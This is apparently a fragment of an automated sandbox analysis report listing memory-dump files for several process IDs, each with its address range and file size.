memory/2740-366-0x00007FFC02A10000-0x00007FFC02A32000-memory.dmpFilesize
136KB
-
memory/3888-2-0x00007FFBF22F3000-0x00007FFBF22F5000-memory.dmpFilesize
8KB
-
memory/3888-18-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/3888-14-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/3888-17-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/3888-13-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/3888-8-0x000001EB4FD00000-0x000001EB4FD22000-memory.dmpFilesize
136KB
-
memory/4156-30-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/4156-35-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/4156-38-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/4156-34-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/4156-33-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/4156-32-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/4156-29-0x00007FFBF22F0000-0x00007FFBF2DB1000-memory.dmpFilesize
10.8MB
-
memory/4380-435-0x00007FFC03000000-0x00007FFC0301F000-memory.dmpFilesize
124KB
-
memory/4380-437-0x00007FFBF4540000-0x00007FFBF49AE000-memory.dmpFilesize
4.4MB
-
memory/4380-434-0x00007FFC03020000-0x00007FFC0304D000-memory.dmpFilesize
180KB
-
memory/4380-432-0x00007FFC0BAD0000-0x00007FFC0BADD000-memory.dmpFilesize
52KB
-
memory/4380-436-0x00007FFBF4150000-0x00007FFBF42C1000-memory.dmpFilesize
1.4MB
-
memory/4380-440-0x0000022C513F0000-0x0000022C51765000-memory.dmpFilesize
3.5MB
-
memory/4380-441-0x00007FFC02A70000-0x00007FFC02B28000-memory.dmpFilesize
736KB
-
memory/4380-439-0x00007FFBF3DD0000-0x00007FFBF4145000-memory.dmpFilesize
3.5MB
-
memory/4380-438-0x00007FFC02FD0000-0x00007FFC02FFE000-memory.dmpFilesize
184KB
-
memory/4380-433-0x00007FFC035E0000-0x00007FFC035F9000-memory.dmpFilesize
100KB
-
memory/4380-443-0x00007FFC02FB0000-0x00007FFC02FC5000-memory.dmpFilesize
84KB
-
memory/4380-442-0x00007FFC03490000-0x00007FFC034B4000-memory.dmpFilesize
144KB
-
memory/4380-444-0x00007FFC08030000-0x00007FFC08040000-memory.dmpFilesize
64KB
-
memory/4380-447-0x00007FFC02BB0000-0x00007FFC02BC4000-memory.dmpFilesize
80KB
-
memory/4380-446-0x00007FFC02F90000-0x00007FFC02FA4000-memory.dmpFilesize
80KB
-
memory/4380-445-0x00007FFC03640000-0x00007FFC03659000-memory.dmpFilesize
100KB
-
memory/4380-431-0x00007FFC03640000-0x00007FFC03659000-memory.dmpFilesize
100KB
-
memory/4380-429-0x00007FFC03490000-0x00007FFC034B4000-memory.dmpFilesize
144KB
-
memory/4380-430-0x00007FFC0BC80000-0x00007FFC0BC8F000-memory.dmpFilesize
60KB
-
memory/4380-428-0x00007FFBF4540000-0x00007FFBF49AE000-memory.dmpFilesize
4.4MB